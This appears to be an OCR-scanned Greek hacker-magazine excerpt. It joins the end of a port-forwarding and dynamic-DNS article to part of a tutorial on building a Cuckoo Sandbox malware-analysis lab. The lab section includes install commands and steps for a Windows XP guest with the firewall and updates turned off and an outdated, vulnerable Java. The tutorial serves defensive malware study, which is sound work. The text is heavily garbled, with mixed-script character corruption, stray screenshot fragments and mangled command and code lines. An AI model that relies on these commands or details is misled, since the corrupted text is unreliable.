апо rov router— και να επισκεφτούµε τη διεύθυνση του web panel του 
router. Πρόκειται για την ιδιωτική διεύθυνση IP του router, ακολουθούμε- 
νη апо ἀνω-κάτω τελεία και то port σύνδεσης. Па εμάς, n.x., η ζητούμε- 
νη διεύθυνση εἶναι п 10.20.30.5, το port εἶναι το 8081, οπὀτε στη μπάρα 
διευθύνσεων του web browser πληκτρολογούμε http://10.20.30.1:8081. 
Αν δεν ἐχετε ιδέα για τα αντίστοιχα στοιχεία του δικού σας router, θα 
πρέπει eire va ανατρέξετε στο συνοδευτικὀ βιβλιαράκι της συσκευἠς eire 
να ελέγξετε ro manual, που θα βρείτε στις σελίδες υποστήριξης του ISP 
σας. Στο manual θα αναφέρονται και τα προκαθορισµένα στοιχεία του 
administrator (username και password) για τη σύνδεση στον αντίστοιχο 
λογαριασμὀ. Αφού Aoinóv κάνουμε login στο web panel, µεταβαίνουμε 
στην ενότητα του port forwarding και ορἰζουµε τους κανόνες µας. Επειδἠ 
τα web panel των routers διαφέρουν σημαντικὰ апо μοντέλο σε μοντέλο, 
δεν εἶναι καθόλου πρακτικὀ να δώσουμε συγκεκριµένα παραδείγματα. 
Апо τη στιγµἠ ὁμως που ἐχετε καταλάβει τι εἶναι ro port forwarding και 
πὼς δουλεύει, πιστεύουμε От! εὐκολα θα βγάλετε ἀκρη. Av ὀχι, υπάρχει 
πάντα και η βάση δεδομένων στο 


http://portforward.com 


Στις σχετικἐς εικὀνες του άρθρου θα δείτε kai μερικά παραδείγματα kavó- 
νῶν port forwarding που έχουμε υλοποιήσει στο pfSense, το αγαπημένο 
μας λειτουργικὀ σύστημα για μηχανήματα σε ρὀλο router/firewall. Па το 
δωρεὰν pfSense µπορείτε να μάθετε πολλά περισσότερα παρακολουθώ- 
ντας το deltaCast 501607: 


http://deltahacker.gr/?p=8234 


Σημείωση. To port forwarding δεν ἐχει σημασία μόνο για physical 
hosts (αληθινούς υπολογιστές) αλλά και για virtual machines 
(VMs, εικονικἐς μηχανές). Απλά, αν έχετε κάποια υπηρεσία σε VM 
και θέλετε να κάνετε προς αυτήν &va port forwarding, φροντίστε 
ὡστε TO VM va аук στο LAN πίσω апо τον router. Πρακτικά, σε 
περιβάλλον VirtualBox ñ VMware, δώστε στο VM δικτύωση τύπου 
bridged. 


Dynamic DNS 


Έχουμε λοιπόν φτιάξει τους κανόνες port forwarding στον router µας, 
εἶμαστε εκτὀς τοπικού δικτύου και θέλουμε va συνδεθούμε σε κάποιον 
υπολογιστὴ εντὸς LAN (nico απὀ rov router). Εκτὸς anó το να θυμόμαστε 
το σωστό port για κάθε υπηρεσία, πρέπει να έχουμε σημειωμένο κάπου 
και το δημόσιο IP του router. 


Hint: Па να δείτε το δημόσιο IP rou router σας, ανοἰξτε ἑναν 
οποιονδήποτε web browser (σε υπολογιστή πἰσω απὀ τον router) 
κι επισκεφτείτε τη διεύθυνση http://checkip.dyndns.org. 


Πώς δουλεύουν τα δίκτυα 
«Αα 


Το θέµα εἶναι ότι, κατὰ паса πιθανότητα, το IP αυτό εἶναι δυναμικὀ. Ναι 
μεν μάς ἐχει αποδοθεἰ апо τον ISP, ωστόσο ауа πάσα στιγμή ενδέχεται ν΄ 
αλλάξει. Πώς θα ενημερωθούμε για µια ενδεχόμενη αλλαγή, ειδικἁ όταν 
εἰμαστε εκτὸς τοπικού δικτύου; 


Μια ἄριστη λύση που μπορούμε να εφαρμόσουμε, εἶναι va καταφύγουμε 
σε ша --κατά προτίµηση δωρεὰν-- υπηρεσία dynamic DNS. Χρησιμοποι- 
ὠντας µια υπηρεσία rou εἶδους μάς παρέχεται η δυνατότητα επιλογἠς 
gvóc domain name, το οποίο πάντα θα αντιστοιχίζεται στο δημόσιο IP 
TOU router. Ακόμα κι ὁταν το IP αυτὸ αλλάζει, η αντιστοίχιση domain 
name «© δημόσιο IP θα ενημερώνεται αυτόματα, οπὀτε το μόνο που θα 
χρειάζεται να θυμόμαστε εμεῖς εἶναι To domain name! (Θα συμφωνήσετε, 
φανταζόμαστε, ὁτι οι περισσότεροι τουλάχιστον ἄνθρωποι εἶναι πιο εὐκο- 
Ло να θυμούνται ἑνα ὀνομα, пара µια τετράδα αριθμών.) 


Αλλά λογικὀ εἶναι у’ αναρωτηθεὶ κανεὶς noc επιτυγχάνεται η αυτόματη 
ενηµέρωση της αντιστοίχισης domain name €» δημόσιο IP. Όλες οι υπη- 
ρεσἰες dynamic DNS, ὁπως n no-ip.com (παρἐχεται δωρεὰν) και η dyn. 
com (δεν εἶναι πλέον δωρεὰν), προσφέρουν µια ора апо dynamic DNS 
clients --συνήθως για Windows, OS X και Linux—, οι οποίοι φροντίζουν 
ακριβώς γι΄ αυτὀ. Πρόκειται για προγράµµατα που εγκαθίστανται ос’ ἑναν 
υπολογιστὴ του τοπικού δικτύου, τα οποία κάθε τόσο ελέγχουν αν το 
δημόσιο IP του router μπροστά τους ἐχει αλλάξει. Με το που θα διαπιστώ- 
couv αλλαγή, σπεύδουν va ειδοποιήσουν τους servers της αντίστοιχης 
εταιρείας. Έτσι, η αντιστοίχιση domain name €» δημόσιο ІР ἐχει πάντα 
νόημα για τον δικὀ µας router. 


Ξέρετε τι εἰναι το καλύτερο ос’ όλα айта; Ότι πολλοί routers, του pfSense 
συμπεριλαμβανομένου, παρέχουν апо μόνοι τους υποστήριξη για διάφο- 
ρες υπηρεσίες dynamic DNS! Έτσι, δεν χρειάζεται να εγκατασταθεί ειδικὀ 
client software, σε κάποιον υπολογιστή του τοπικού δικτύου. 


Συνδεθείτε στο web panel του router σας και ψάξτε για κάποια σχετικἠ 
επιλογἡ περί dynamic DNS. Βρήκατε μία; Πολὺ ωραία! Δημιουργήστε ¿va 
δωρεὰν account σε µια υπηρεσία όπως ro no-ip.com, επιλέξτε ¿va апо τα 
δωρεὰν domains (n.x., no-ip.org, hopto.org, redirectme.net), καθώς κι 
va hostname. Εμείς, π.χ., για £va pfSense VM που ἐχουμε ото DMZ του 
αληθινού, VDSL router, ἔχουμε δημιουργήσει το deltanet.no-ip.org. Αφού 
δημιουργήσετε ro ὀνομα, επιστρέψτε пал! ото web panel rou router και 
συμπληρώστε τη σχετικἁ πεδία. (Μιλάμε για τα username kai password 
του λογαριασμού σας στην υποστηριζόμενη υπηρεσία DNS, καθώς και 
TO domain name nou δηµιουργήσατε.) Αυτό ἡταν! Апо ‘ӧо και στο εξἠς, 
το µόνο που χρειάζεται va θυμόσαστε εἶναι то ὀνομα nou κατοχυρώσατε 
στην υπηρεσία dynamic DNS. 


Τέλος, αν ο router σας δεν υποστηρίζει DNS, δεν υπάρχει λὀγος για στε- 
voxopia. Μπορείτε πάντα να εγκαταστήσετε ἑναν κατάλληλο dynamic 
DNS client σε κάποιον υπολογιστή του τοπικού σας δικτύου, ο οποίος 
μένει ανοικτὸς την περισσότερη opa. Και vai, κατάλληλοι clients διατίθε- 
ута! τόσο για Linux, боо και για BSD. Απλά το λέμε ;) 
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Skill: 
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Tags: malware, AN V ε| F) J еј ri 
sandboxing, 

το. malware 
virtualization, Е 
VirtualBox, а 

к ACRON OUG: 


machines 
(Μέρος 111) 


Στη Φωβιά του 
...Cuckoo 


Στο προηγούμενο τεύχος δεἰξαμε | 
αναλυτικά noc πραγματοποιούμε 
μόνοι µας τη λεγόμενη δυναμικἠ 
ανάλυση ενὸς δείγματος κακὀβουλου | 
λογισμικού. Για τις ανάγκες της 
εργασίας µας φτιάξαμε µια εικονικἠ 
μηχανή- εργαστήριο, yia τη φιλοξενία | 
του κακὀβουλου δείγματος. Σε αυτή 
την εικονική μηχανή προσθέσαμε | 
κι όλα ra апараітпта εργαλεία, ενώ 
μετὰ Eiða E τον τρόπο χρήσης rou 
καθενός. H διαδικασία που γνωρίσαμε | 
εἶναι σωστή και ιδιαίτερα χρήσιμη 
για να αποκτήσουμε γνώσεις σχετικά 
µε τη δράση £vóc κακόβουλου | 
προγράμματος. Ελπίζουμε От! 
μάθατε αρκετά πράγματα αλλά, | 
όπως καταλαβαίνετε, το ζήτημα της 
ανάλυσης malware δεν τελειώνει εκεῖ! I 
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Καθώς στήναμε το εργαστήριο για τις δοκιμές, εἶναι πολὺ πιθανὸ να σας 
δημιουργήθηκε το ακὀλουθο ερώτημα: Ωραία όλα αυτά, алла τι γίνεται 
στην περίπτωση που avri για τρία ἡ πέντε δείγματα malware, θέλουμε va 
αναλύσουμε τριακόσια ἡ πεντακόσια; 


Δεν πιστεύουμε να νομίζετε От! θα τα εξετάσουμε ἑνα προς ёха και... 
µε το ҳёрг;! Κάτι τέτοιο θα µας ἐπαιρνε εβδομάδες ἡ ακόµη και μήνες. 
Ευτυχώς, ὀπως ὀλες οι διαδικασίες που εμφανίζουν µια περιοδικὀτητα 
και εκτελούνται σε υπολογιστή, ἐτσι και η ανάλυση malware μπορεἰ να 
αυτοματοποιηθεἰ. Αυτὸς ακριβώς ο αυτοματισμός θα αποτελέσει και το 
αντικείµενο του παρόντος άρθρου. 


Προστατευτικά κουτιά 


Н κύρια έννοια nou θα µας απασχολἠσει στο παρὸν άρθρο εἶναι αυτἠ του 
malware sandbox. Ένα sandbox (στην επιστήμη της πληροφορικής) εἶναι 
στην ουσία ἑνας unxaviouóc ασφαλείας yia την εκτέλεση µη ἐμπιστων 
προγραμμάτων. Όπως υπονοεί και ο ἰδιος ο ὀρος, µπορείτε va ro φαντά- 
ζεστε σαν ἑνα σφραγισμἐνο/θωρακισμἑένο κουτί. To sandbox αποτελεἰ 
ἑνα απομονωμένο εικονικὀ σύστημα, στο εσωτερικὀ του οποίου EKTE- 
λείται ο κακόβουλος κώδικας. Σε ἑνα sandbox μπορούν να προστεθούν 
πολλὲς λειτουργίες, όπως για παράδειγµα η προσομοίωση δικτυακών 
υπηρεσιών, ὥστε το εκάστοτε malware να ξεγελαστεί και να πιστέψει От! 
εκτελείται σε ἑναν kavovikó υπολογιστή. 


Υπάρχουν πολλά ἑτοιμα malware sandboxes, που υποστηρίζονται апо 
εταιρείες ανάλυσης malware. Γνωστά παραδείγματα αποτελούν τα 
Norman Sandbox, GFI Sandbox, Anubis к.а. Πρὀκειται για υπηρεσὶ- 
ες στις οποίες µπορεί να στέλνει κανεἰς διάφορα δείγματα malware ка! 
να λαμβάνει την ανάλυση δωρεάν. Στα nAaicia του άρθρου µας yia το 
Dionaea malware honeypot (βλ. deltaHacker 007), εἶχαμε ρυθμίσει την 
αυτόματη αποστολἠ των δειγμάτων malware σε τέτοιες υπηρεσίες. Έτσι, 
σε σύντομο χρονικό διάστηµα λαμβάναμε στο email µας та αποτελέσμα- 
τα της εκάστοτε ανάλυσης. H ανάλυση που πραγματοποιείται апо αυτὲς 
τις υπηρεσἰες αποτελεί µια πρώτης τάξεως αφετηρἰα για τη δικἠ µας δου- 
Ла. Στην ουσία, ἑνα sandbox εκτελεἰ το malware στο εσωτερικὀ του και 
καταγράφει κάθε δραστηριότητα rou κακὀβουλου προγράμματος. Ἐτσι, 
η διαδικασία της δυναμικὴς ανάλυσης αυτοματοποιείται σε µεγάλο Bað- 
uò! Όπως καταλαβαίνετε, auró αποτελεἰ τεράστιο πλεονέκτημα για τα 
sandboxes κι όταν σκοπεύουµε να αναλύσουμε δεκάδες ἡ εκατοντάδες 
δείγματα γίνεται ακόµα πιο σημαντικὀ. 


Кака τα ψέματα, ὅμως. H χρήση των sandboxes ἐχει και ορισμένα µειο- 
νεκτήματα, τα οποία µε τη σειρἀ µας θα πρέπει να έχουμε ката νου. Па 
παράδειγµα, ἑνα sandbox εκτελεί το κακόβουλο πρόγραµµα ὁπως rou то 
δίνουμε, χωρὶς τα command-line options που εἶναι πιθανὀ να δέχεται. 
Επομένως, αν αυτές οι παράμετροι ενεργοποιούν βασικὲς λειτουργίες του 
malware δεν θα εκτελεστούν και δεν θα μάθουμε ποτὲ για αυτές. 'Eva 
ἆλλο κλασικὀ μειονέκτημα εἶναι TO χρονικὀ ὀριο που ἐχει το εκάστοτε 
sandbox yia την εκτέλεση και την ανάλυση ενός malware. Προφανώς, 
αν σκοπεύουµε να αναλύσουμε μερικὲς δεκάδες διαφορετικά δείγματα, 
δεν μπορούμε να δίνουμε στο καθένα апо éva μεγάλο χρονικό διάστηµα. 
Αυτός ο περιορισμός ενδέχεται να κρύψει τη δραστηριότητα ορισμένων 
malware. Υπάρχουν malware που αμέσως μετά την εγκατἀστασἠ τους 
«κοιμούνται» και αναλαμβάνουν δράση μετὰ апо μερικὲς ὡρες — ἡ και 
την επόμενη ημέρα. Όπως αντιλαμβάνεστε, δε γίνεται va δεσµεύσουμε 


Στη φωλιά του ...Cuckoo 
Αα 


ἑνα sandbox yia τόσο μεγάλο χρονικό διάστηµα. Στα μειονεκτήματα των 
sandboxes περιλαμβάνονται και τα ακόλουθα: 


ο Ta κακὀβουλα προγράμματα (ειδικἀ τα νεότερα) αντιλαμβάνονται 
αν εκτελούνται μέσα σε εικονικὀ σύστημα ñ σε πραγµατικὀ. Av 
ΤΟ malware καταλάβει ότι βρίσκεται σε sandbox (το οποίο ὁπως 
εἰπαμε αποτελεἰ ¿va εικονικὀ σύστημα) τότε µπορεἰ να µη δράσει 
καθόλου ἡ ακόµα χειρὀτερα να δράσει µε εντελὠς παραπλανητικὀ 
τρὀπο, για να μπερδέψει τους υποψήφιους αναλυτὲς του. 


ο Ορισμένες φορὲς ro sandbox εἶναι γυμνό: Δεν περιέχει οὐτε τα 
προγράμματα οὐτε τα δεδομένα nou θα εντὀπιζε ἑνα malware σε 
κάποιο κανονικὀ σύστημα και τα οποία θα στόχευε. Τέτοιες πε- 
ριπτὠσεις στόχων αποτελούν ορισμένα ευπαθήἠ προγράμματα των 
Windows, ὁπως και διάφορα κλειδιἁ του Registry. Αποτέλεσμα au- 
TOV TOV απουσιών εἶναι να µην φανερώνεται ὁλη η δράση του 
malware. 


ο To λειτουργικό σύστημα και γενικότερα το περιβάλλον του sandbox 
ενδέχεται να µην εἶναι το κατάλληλο για την εκτέλεση κι ανἁλυ- 
ση ενὸς δείγματος malware. Па παράδειγµα, ἑνα κακόβουλο npó- 
vpaupa μπορεἰ να ἐχει σχεδιαστεἰ για συγκεκριμένη ἐκδοση των 
Windows ΧΡ. Av ro sandbox στηρἱζεται στα Windows 7, το malware 
ενδέχεται να µην εκτελεστεί καθόλου. 


H αρχιτεκτονική 
του Cuckoo: απλή 
αλλά πλήρως 


e Τα αποτελέσµατα που παράγει η ανάλυση ενὸς malware µέσα σε Ένας .... 


ἑνα sandbox, δεν εἶναι ποτὲ ολοκληρωμένα. Ένα sandbox δεν χειρίζεται διάφορα 


µπορεί να καθορἰσει οὐτε καν τι ακριβώς εἶναι αυτό που αναλύει Cuckoo guests ως 
(Trojan horse ἡ rootkit). H φύση rou malware εἶναι кат! που 0a sandboxes, ота 
πρέπει να ανακαλύψουμε μόνοι µας, μελετώντας τα αποτελέσµατα οποία ανατίθεται 
της ανάλυσης και στηριζὀµενοι στην εμπειρία µας. enm Ppop 


Analysis Guests 
A clean environment when run a 


Cuckoo host sample. 
Responsible for guest and The sample behavior is reported back to 
analysis management. the Cuckoo host. 


Start analysis, dumps traffic 
and generates reports. 


Analysis VM n.1 


Analysis VM n.2 


Virtual network 
Internet / Sinkhole An isolated network where 
run analysis virtual 

machines. Analysis VM n.3 
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Φέρνει ἑνας Κούκος την Ἀνοιξη;! 


Ὄχι, δεν µας έπιασε κάποιου εἰδους λαογραφικἠ μανία. Στο παρὸν άρθρο 
θα χρησιμοποιήσουμε ἑνα πακέτο λογισμικού για τη δηµιουργία και τη 
διαχείριση sandboxes, το οποίο ονομάζεται Cuckoo Sandbox! Το Cuckoo 
εἶναι αρκετά γνωστὸ στο ҳоро των αναλυτών κακόβουλου λογισμικού. 
Επισήμως, περιγράφεται σαν ἑνα «σύστημα αυτοματοποιημµένης ауали- 
σης malware». Χρησιμοποιείται για την εκτέλεση και ανάλυση διαφόρων 
αρχείων και για τη δημιουργία περιεκτικότατων αναφορών. Ὅλα τα npo- 
γράμματα nou εκτελεἰ το Cuckoo τρέχουν μέσα σε éva απομονωμένο 
εικονικὀ σύστημα, µε λειτουργικὀ της οικογένειας Windows. To Cuckoo 
µπορεί να ανιχνεύει και να καταγράφει τα ακόλουθα στοιχεία: 


ο Τις κλήσεις συστήματος που πραγματοποιεί κάθε διεργασία που δη- 
μιουργήθηκε апо το κακόβουλο πρόγραµµα (ακόµα κι αυτών που 
έφτιαξε για να αποκρύψει την ὑπαρξη rou). 


ο Όλα τα αρχεία που δημιουργήθηκαν, διαγράφηκαν και λήφθηκαν 
апо το Διαδίκτυο, ката την εκτἐλεση rou malware. 


e Στιγμιότυπα της μνήμης RAM µε όλες τις ενέργειες nou праүра- 
τοποιήθηκαν апо τις διεργασἰες του malware, μαζί µε ολόκληρα 
αντίγραφα της μνήμης του sandbox. 


ο Τη δικτυακή κίνηση που παρατηρήθηκε κατὰ την εκτέλεση του 
προγράμματος μέσα oro sandbox, την οποία αποθηκεύει σε αρχείο 
PCAP (packet capture). 


e Screenshot της επιφάνειας εργασίας ката την εκτέλεση του 
malware (χρήσιμο για trojan horses, που παρουσιάζουν τον εαυτὀ 
τους ως κάτι δήθεν χρήσιμο). 


To Cuckoo αναπτύσσεται ενεργὰἁ --ἐχει πἀρει χρηματοδότηση κι апо τη 
Rapid7, την ιδιοκτήτρια του Metasploit— ка! η τρέχουσα ἐκδοση (0.5) 
παρουσιάστηκε τον περασμένο Δεκέμβριο. Μπορεί να αναλύσει διαφὀ- 
ρων ειδὠν αρχεία και αντικείμενα, ὁπως: Εκτελἑσιµα αρχεία εφαρμογών 
Windows, αρχεία DLL, αρχεία PDF και Microsoft Office, URLs και σχεδὸν 
οτιδήποτε ἆλλο μπορεἰ vq εκτελεστεἰ ñ vq avaAu8si! To Cuckoo χωρίζεται 
σε боо тийната: Στον Cuckoo host και στους Cuckoo guests. Τα Cuckoo 
guests αποτελούν τις εικονικὲς μηχανές στις οποἰες εκτελούνται τα δεἰγ- 
рата malware. Αυτές οι μηχανές βρίσκονται συνήθως σε διαφορετικὀ 
υπολογιστή απὸ τον Cuckoo host. Αυτό που κάνει ο αναλυτής malware 
εἶναι να αποστέλλει κακόβουλα προγράµµατα στον Cuckoo host και το 
πρὀγραμμα αναλαμβάνει να εκτελέσει κάθε va απ’ αυτά τα αρχεία σε 
κάποιον διαθέσιμο Cuckoo guest. Βλέποντας τη σχετικἠ εικόνα θα KaTa- 
λάβετε εὐκολα την αρχιτεκτονικἠ του συστήματος. 


Εγκατάσταση και ρύθμιση 


H εργασία µας θα ξεκινήσει απὸ τον Cuckoo host. Πρόκειται yia τον uno- 
λογιστή στον οποίο εγκαθἰσταται το ἴδιο το Cuckoo. Στα πλαἰσια της na- 
ρουσἰασἠς µας, στον ἰδιο υπολογιστή θα εγκαταστήσουµε και pia εικονι- 
кї μηχανὴ nou θα λειτουργεί ως ro (μοναδικὀ) Cuckoo guest. Το σύστημα 
στο οποίο εργαστήκαµε ἐτρεχε το BackTrack 5 ВЗ. Ωστόσο, αυτή η eni- 
λογἠ апо μέρους µας δεν ἦταν και η καλύτερη δυνατή. Προτείνουμε va 
στηριχτεἰτε στην τελευταἰα ἐκδοση του Ubuntu Linux. 


Στη φωλιά του ...Cuckoo 
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Ξεκινάμε anó τα npoanairoüpeva πακέτα και βιβλιοθήκες που xpnoipo- 
ποιεἰ το Cuckoo. Αρχικά, πρέπει να εγκαταστήσουµετη γλὠσσα проүрар- 
ματισμού Python. Στο BackTrack βέβαια η Python υπάρχει εκ των npo- 
TÉpov εγκατεστημένη. Αν χρησιμοποιείτε ἄλλη, Debian-based διανομὴ 
Linux, η εγκατάσταση της Python μπορεί να γίνει κάπως ἐτσι: 


user@host:~$ sudo aptitude install python 


Συνεχίζουμε εγκαθιστὠντας ro πρὀγραμμα pip. Πρόκειται yia va εργα- 
λείο προσθαφαἱρεσης πακέτων της Python, σαν αυτά που βρἰσκονται ото 
αποθετἠριο λογισμικού ΡΥΡΙ (Python Package Index). To pip εἶναι ιδιαΐτε- 
ρα χρήσιμο γιατἰ µέσω αυτού μπορούμε να εγκαταστήσουµε πακέτα και 
βιβλιοθήκες της Python nou eire δεν υπάρχουν ως πακέτα DEB/RPM eire 
υπάρχουν алла σε παλιὲς κι ακατάλληλες για το σκοπὀ µας εκδόσεις. H 
εγκατάσταση rou pip oro BackTrack γίνεται πολύ εὐκολα: 


rootQbt:-4 aptitude install python-pip 


F . : { А , Πα va αφήσουμε το 
Προχωρούμε εγκαθιστώὠντας μερικὰ ακόµα πακέτα, που απαιτούνται για malware va δράσει 


τη A&rroupyia rou Cuckoo: ανενόχλητο, πρέπει 
š š š va απενεργοποιή- 

rootQbt:-4 aptitude install python-magic python-mako python- coup ro Firewall 
libvirt καθώς kai την 


υπηρεσία Update 


Στη συνέχεια προσθέτουμε κι ἄλλα πακέτα, алла αυτή τη фора µε ro pip: των Windows ΧΡ. 


Cuckoo [Running] - Oracle VM VirtualBox 


** Windows Firewall 


General | Exceptions | Advanced | 


General Computer Name Hardware 
буз чп Restore Automatic Updates 


Windows Firewall helps protect your computer by preventing unauthorized users 


Help protect your PC from gaining access to your computer through the Internet or a network. 


Windows can regularly check for important updates and insta 

[Turning on Automatic Updates may automatically update W: @ © On (recommended) 

software first, before any other updates.) Files Е š Р 

How does Automatic Updates work? This setting blocks all outside sources from connecting to this 
computer, with the exception of those selected оп the Exceptions tab. 


С) Automatic (recommended) 
Automatically download recommended updates Don't allow exceptions 
ө апа install them: 

Select this when you connect to public networks in less secure 
locations, such as airports. Y'ou will not be notified when Windows 
Firewall blocks programs. Selections on the Exceptions tab will be 
(O Download updates for me, but let me choose when to ins ignored. 


С) Notify me but don't automatically download or install them [X] @ Off [not recommended) 


© Tum off Automatic Updates. Avoid using this setting. Turning off Windows Firewall may make this 
Your computer will be more vulnerable unless yd computer more vulnerable to viruses and intruders. 
regularly. 
Install updates from the Windows 


Every day at |3:00.4M 


Offer updates again that I've "iously hidden 


What else should | know about Windows Firewall? 


mmm Cancel 


1:56 PM 


& @ e= о A E Right cti 
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root@bt:~# pip install sqlalchemy dpkt jinja2 pymongo bottle 
pefile 


Επόμενο βήμα εἶναι η χειροκίνητη εγκατάσταση των προγραμμάτων 
ssdeep ка! pyssdeep: 


root@bt:~# wget http://downloads.sourceforge.net/project/ssdeep/ 
ssdeep-2.9/ssdeep-2.9.tar.gz 


root@bt:~# tar zxvf ssdeep-2.9.tar.gz 
root@bt:~# cd ssdeep-2.9 
root(bt:-/ssdeep-2.9it ./configure 
root(bt:-/ssdeep-2.9it make 
root(bt:-/ssdeep-2.9i4 make install 
root(bt:-/ssdeep-2.94 cd .. 


root@bt:~# svn checkout http: //pyssdeep.googlecode.com/svn/ 
trunk/ pyssdeep 


root@bt:~# cd pyssdeep 
root@bt:~# python setup.py build 
root@bt:~# python setup.py install 


Επίσης, πρέπει va εγκαταστήσουμµε το γνωστό εργαλεἰο καταγραφἠς õi- 
κτυακἠς κίνησης tcpdump. Προφανώς, το εν λόγω εργαλεἰο υπάρχει ἠδη 
στο BackTrack, алла σε περίπτωση που χρησιµοποιείτε άλλη διανομή θα 
πρέπει να το εγκαταστήσετε κάπως έτσι: 


user@host:~$ sudo aptitude install tcpdump 


user@host:~$ sudo setcap cap net гам, сар net admin-eip /usr/ 
sbin/tcpdump 


Τέλος, κατεβάζουμε στον υπολογιστή µας το ібіо το Cuckoo, µέσα στον 
κατάλογο /opt/cuckoo: 


root@bt:~# cd /opt 
root@bt:/opt# git clone git://github.com/cuckoobox/cuckoo.git 


Πριν ξεκινήσουμε τη χρήση του Cuckoo οφείλουμε να κάνουμε µια μικρὴ 
διόρθωση στον κὠδικά του, σύμφωνα µε το ακόλουθο patch: http://bit. 
ly/13bp2uJ. Αρχικἁ ανοἰγουµε το αρχείο /opt/cuckoo/lib/cuckoo/common/ 
utils.py µε κάποιον plain text editor και αντικαθιστούμε τα περιεχόμενα 
της үранийс 107 µε τα ακὀλουθα: 


if hasattr(t, ' connection') and t._connection[1] and t. 
connection[1].sock: 


Προσοχή: О gooxšç στον κὠδικα (το κάθε TAB την αρχἠ rov γραμμών) 
αποτελούν στοιχεία της δομής ενὸς προγράµµατος σε Python! Επομένως, 
προσθέτοντας το νέο περιεχόμενο στη γραμμὴ 107 εἶναι κρίσιμο να ξεκι- 
νήσουμε апо εκεί που ξεκινούσε то пало της περιεχόµενο (ακριβώς κάτω 
апо τη δίεση της προηγούμενης γραμμής). 


Εγκατάσταση και ρύθμιση ενὸς Cuckoo guest 


Μετά апо τα παραπάνω το Cuckoo host εἶναι ἐτοιμο και περιμένει τα 
Cuckoo guests! Το Cuckoo Χρησιμοποιεί εικονικὲς μηχανές ως sandboxes 
και μέσα σε αυτές εκτελεἰ τα δείγματα malware που του δίνει ο χρήστης. 


Στη φωλιά του ...Cuckoo 
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З Download Java 6 Update 18 - OldApps.com - Microsoft Internet Explorer 


di View Favorites Tool Ξε 


k- Ç2 [κ] E] f» yo Search σος Favorites © A- š 2% 


Address 48] рун. i&! Java Setup - Complete 


Ba 


You have successfully installed Java. 


Home wein Java updates will automatically be downloaded to provide you with the latest 
features and security improvements. To change this, see 
http://java.com/autoupdate 


Close 


JavaScript ID 


jetbrains.com/webstorm 


Latest version wi 
€ ΠῚ > 


Ф Internet 


δὴ Error on page, 


start F Download Java 6 Upd... ЇЇ Java Setup - Complete X USE 4:13 AM 


(3 @ [S] Right Ctrl 


Ὅπως εἶπαμε, αυτὲς oi εικονικὲς μηχανὲς ονομάζονται Cuckoo guests ка! Με тоу κακὀ χαμό 
μπορούν να εἶναι οσεσδἠποτε. Στο δικὀ µας (απλὀ) σενάριο θα εργαστού- που γίνεται τελευ- 


µε ως εξής: Θα συνδέσουµε το Cuckoo µε ro VirtualBox, то οποίο και θα σα, п EYKOTUOTO- 
ση µιας απαρχαιω- 


χρησιμοποιηθεί για τη δηµιουργία µιας εικονικἠς μηχανής. Αυτή η εικο- μένης (και σίγουρα 

νική μηχανὴ θα ἐχει ως λειτουργικὀ σύστημα της та Windows ΧΡ και θα ευπαθούς) ἐκδοσης 

αποτελέσει ¿vav opaióraro Cuckoo guest. της Java κρίθηκε 
απαραίτητη! 

Ας δούμε λοιπόν τις απαραίτητες ρυθμίσεις. Кат’ αρχάς πρέπει va δηµι- 

ουργήσετε uia εικονικἠ μηχανὴ µε ro VirtualBox. H διαδικασία για κάτι 

Τέτοιο πρέπει να σας εἶναι αρκετά οικεία, алла σε κάθε περίπτωση uno- 

рє! να ανατρέξετε o” αυτόν τον οδηγὀ: http://deltahacker.gr/?p-2667. Αν 

δεν ἐχετε ἠδη εγκατεστημένο ro VirtualBox, μπορείτε να το κατεβάσετε 

anó τη διεύθυνση: https://www.virtualbox.org/wiki/Linux_Downloads (για 

το BackTrack επιλέξαμε το πακέτο i386, που προορίζεται yia το Ubuntu 

10.04). 


Σημαντικὀ εδὠ εἶναι να δώσετε στην εικονικἠ μηχανὴ ro буора «Cuckoo» 
(χωρἰς та εισαγωγικἀ), ὠστενα συμφωνούν αυτά που θα βλέπετε µε αυτά 
που θα διαβάζετε. Па λειτουργικὀ σύστημα εγκαταστήσαμε την Αγγλικἠ 
ἐκδοση των Windows ΧΡ SP3. Προτείνουμε να κάνετε то ἰδιο, αφού η 
συγκεκριμένη ἐκδοση εἶναι ενδεδειγµένη για την εκτέλεση κακόβουλων 
προγραμμάτων. Αφού ολοκληρώσετε την εγκατἀστασὴ τους, προχωρή- 
σετε στο ακόλουθο σημαντικὀ βήμα: Απενεργοποιεἰστε το Firewall των 


V'HACGKER 


ÁN 


Cuckoo [Running] - Oracle VM VirtualBox 


Па va συνδέσουµε 
To Cuckoo host µε 
To Cuckoo guest, 
πρέπει να иєтафё- 
poupe ro agent.py 
εντός της EIKOVI- 
κής μηχανής. Ta 
shared folders του 
VirtualBox αποτε- 
λούν TO ευκολότε- 
po µέσο γι΄ αυτή 
την αντιγραφή. 
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File Edit 


View Favorites Tools Help 


Ө» = Θ 2 JO search {27 Folders [Ит 


р оь  agent.py 
File and Folder Tasks (< e Python File 
8KB 


29 Make a new folder 
@ Publish this Folder to 
the Web 


Other Places 


τὰ Wboxsvr 

(Ej My Documents 
[у Shared Documents 
9 My Computer 

ФӘ My Network Places 


Windows και To Windows Update! Μπορείτε va αλλάξετε τις ρυθμἰσεις για 
αυτά ra δύο, апо τα εικονἰδια nou θα fpeire στο κάτω μέρος rou Security 
Center (Start > Control Panel > Security Center). Ένα ακόµα anapairn- 
το βήμα εἰναι η εγκατάσταση των VirtualBox Guest Additions (στο пара- 
θυρο ὀπου εκτελεἰται η εικονικἠ μηχανή µε τα Windows, ακολουθεἰστε τη 
διαδροµἠ Devices > Install Guest Additions). 


Συνεχίζουμε µε την εγκατάσταση της Python *evróc* της εικονικἠς un- 
Χανής. Αναρωτιέστε γιατὶ τη χρειαζόμαστε; Μέσα στο Cuckoo guest θα 
πρέπει να εγκαταστήσουμε µια εφαρμογἠ γραμμένη σε Python, η οποία 
αποτελεἰ τμήμα του πακέτου Cuckoo. Αυτό το πρόγραµµα παἰζει το ρόλο 
του μεσολαβητή µε τον Cuckoo host. O τελευταίος θα στέλνει εντολὲς 
στην εν λόγω εφαρµογή, evo η εφαρµογἠ θα επιστρέφει τα αποτελἑσµα- 
τα της ανάλυσης. Avoi&re λοιπὀν τον Internet Explorer (unppp...) στην £l- 
κονικἠ μηχανὴ και κατεβάστε κι εγκαταστἠστε την ἐκδοση 2.7 της γλὠσ- 
σας Python (http://python.org/ftp/python/2.7.3/python-2.7.3.msi). 


Ὅπως αναφέραμε πριν, µια χρήσιμη λειτουργία του Cuckoo εἶναι αυτή 
της αυτόματης λήψης screenshots апо το κάθε sandbox, ката τη διάρ- 
